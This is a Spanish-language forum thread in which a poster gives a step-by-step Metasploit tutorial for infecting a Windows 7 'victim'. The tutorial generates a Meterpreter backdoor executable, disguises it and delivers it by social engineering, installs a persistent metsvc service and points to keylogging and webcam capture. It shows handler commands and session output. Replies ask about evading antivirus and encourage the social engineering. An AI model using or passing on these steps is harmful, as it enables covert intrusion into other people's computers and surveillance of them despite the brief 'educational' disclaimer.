Hola a todos ,aquí les traigo un tutorial de como infectar windows 7 sp1 por medio de la generación de un payload por el modulo msfpayload de metasploit ,generaremos este payload para poder que la victima reciba el archivo lo ejecute y asi poder obtener una shell meterpreter 8) y tener control total sobre esta maquina .
aquí van los pasos a seguir :
1.Generamos el payload con el modulo msfpayload de metasploit ,este payload seria la backdoor para tener control sobre la victima una vez haya recibido nuestra backdoor ,para esto ingresamos a nuestra terminal y escribimos :
Link de la imagen de el procedimiento:
(https://onedrive.live.com/redir?resid=398C61F2768A9EE!202&authkey=!AKWHp_ojvWL7zR0&v=3&ithint=photo%2c.png)
donde:
LHOST=tu ip local.
LPORT=puerto de escucha del payload "backdoor" pueden usar cualquier puerto a su gusto.
x >/root/backdoor.exe este parámetro es para especificar donde vamos a generar el archivo de nuestro payload "backdoor".
2.Ingresamos a nuestra consola de metasploit para ya entrar en efectividad del payload generado por medio de un exploit para esto hacemos lo siguiente:
donde vamos a decirle a metasploit que vamos a usar cierto exploit y sus respectivos parámetros .
vamos a usar un exploit multi-cabecera.
link de la imagen del procedimiento:
(https://onedrive.live.com/redir?resid=398C61F2768A9EE!200&authkey=!AL-u0mw2nYJGyxE&v=3&ithint=photo%2c.png)
use exploit/multi/handler ="aqui estamos diciendo a metasploit que vamos a usar este exploit"
set payload windows/meterpreter="aquí estamos defiendo el payload para nuestro exploit "backdoor".
set lhost=tu dirección ip local
set lport=puerto de escucha.
run para dar como tal ya ejecución a nuestro exploit:
ya como tal se van a la carpeta en este caso root donde van a poder encontrar el archivo backdoor.exe , para no levantar muchas sospechas lo nombramos de otra manera por logica ,bueno ya si todo va bien ,tendremos que por medio de nuestras técnicas de ingeniera social hacer llegar nuestro backdoor a la victima y poder tener acceso a nuestra sesión de meterpreter.
3.procedemos a ejecutar un servicio de acceso y control para inyectárselo a nuestra victima para así tenerla controlada de forma remota ,hacemos lo siguiente:
meterpreter > run metsvc
- Creating a meterpreter service on port 31337
- Creating a temporary installation directory C:\DesktopxD ;) ........................
- >> Uploading metsrv.dll...
- >> Uploading metsvc-server.exe...
- >> Uploading metsvc.exe...
- Starting the service...
- * Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >
4.Nuestra backdoor ya se esta ejecutando como tal en el equipo victima en el puerto 31337 y vamos a declara y definir que vamos a esta maquina escucharlo por el puerto 31337 y hacemos lo siguiente en nuestra consola de meterpreter:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST xxx.xxx.xxx.xxx
RHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > exploit
- Starting the payload handler...
- Started bind handler
- Meterpreter session 2 opened (xxx.xxx.xxx.xxx:31337 -> xxx.xxx.xxx.xxx:31337)
meterpreter >
donde:
set PAYLOAD windows/metsvc_bind_tcp
Aquí estamos definiendo que este escuchando al equipo atacado de manera silenciosa.
set LPORT:
puerto de escucha de el equipo victima.
set RHOST:
Dirección ip del equipo atacado.
ya teniendo control de una sesión meterpreter como tal podemos hacer lo que se nos ocurra como tomar las pulsaciones de el teclado,tomar fotos de la web cam etc etc ;D .
Aquí termina este pequeño tutorial ,todo es con fines educativos de conocimiento de técnicas .
Dejen sus comentarios,complementos,dudas ,gracias a todos :)
Nota de moderador: No se permite ningún tipo de enlace ajeno al foro, y menos para promocionar un sitio web personal.
Lee las reglas: http://underc0de.org/foro/underc0de/reglas-generales-del-foro-(lectura-obligatoria)/
Atte, LucaSthefano
Buena tecnica, pero no siempre tenemos suerte con la ingenieria social, algunas veces he probado esa tecnica, y tengo que comprimir la backdoor.exe porque algunos antivurus la detectan y la eliminan.Tengo dos preguntas.
1 Hay alguna forma de que la backdoor no sea detectada por antivirus??
2 Existe alguna forma de obtener una session meterpreter a windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
Salu2: shirylmfao
Buenas tardes hermano.
1ero. Tienes una forma de redactar un poco confusa y desordenada, lo cual dificulta su correcta comprensión. (Podrías editarlo para que quede de forma mas clara y comprensible)
2do. Las imágenes están caídas. (Podrías intentar subirlas nuevamente)
3ero. A grandes rasgos eso que describes es muy similar a compilar algún troyano para luego enviarlo tirando de la ingeniería social.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
1 Hay alguna forma de que la backdoor no sea detectada por antivirus??
Que hable la sabiduría.. (https://www.google.com.do/search?q=indetectable+.exe&oq=indetectable+.exe&aqs=chrome..69i57j0l5.9112j0j4&sourceid=chrome&es_sm=93&ie=UTF-8)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
2 Existe alguna forma de obtener una session meterpreter a windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
Salu2: shirylmfao
Es el clásico método de recopilar información (servicios, aplicaciones y sus versiones, puertos abiertos, tipo de conexión, etc..) y luego vulnerarlas con algún exploit que no haya sido parcheado aun.
P.D La ingeniería social funciona, simplemente es cuestión de ser audaz.
Saludos por allá hermanos.